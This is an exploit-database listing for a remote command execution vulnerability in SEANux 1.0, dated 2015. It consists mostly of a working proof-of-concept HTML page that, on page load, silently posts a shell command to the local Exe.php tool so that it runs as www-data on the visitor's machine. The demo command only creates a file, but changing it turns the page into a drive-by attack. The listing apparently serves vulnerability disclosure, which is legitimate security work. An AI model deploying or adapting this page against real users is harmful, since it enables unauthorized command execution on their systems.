SEANux 1.0 Remote Command Execution



EKU-ID: 4595 CVE: OSVDB-ID:
Author: Larry W. Cashdollar Published: 2015-02-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<!-- PoC for http://www.vapid.dhs.org/blog/01-23-2015/
Larry W. Cashdollar
@_larry0
2/9/2015
Browse to this page using any browser in SEANux v1.0 to execute commands as www-data.
--!>

<html>
<head>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
<script>
$(document).ready(function(){
        $.post("http://localhost/tools/Exe.php",
        {
          cmd: "touch /tmp/hello",
          execute: "Execute"
        },
        function(data,status){
            alert("Data: " + data + "\nResult: " + status);
    });
});
</script>
</head>
<body>
<h2>
Hello!  You just executed the "touch /tmp/hello" command as www-data on your SEANux 1.0 installation.
</h2>
<hr>
<br>
<a href="http://www.vapid.dhs.org/blog/01-23-2015/">Details Here</a>
</body>
</html>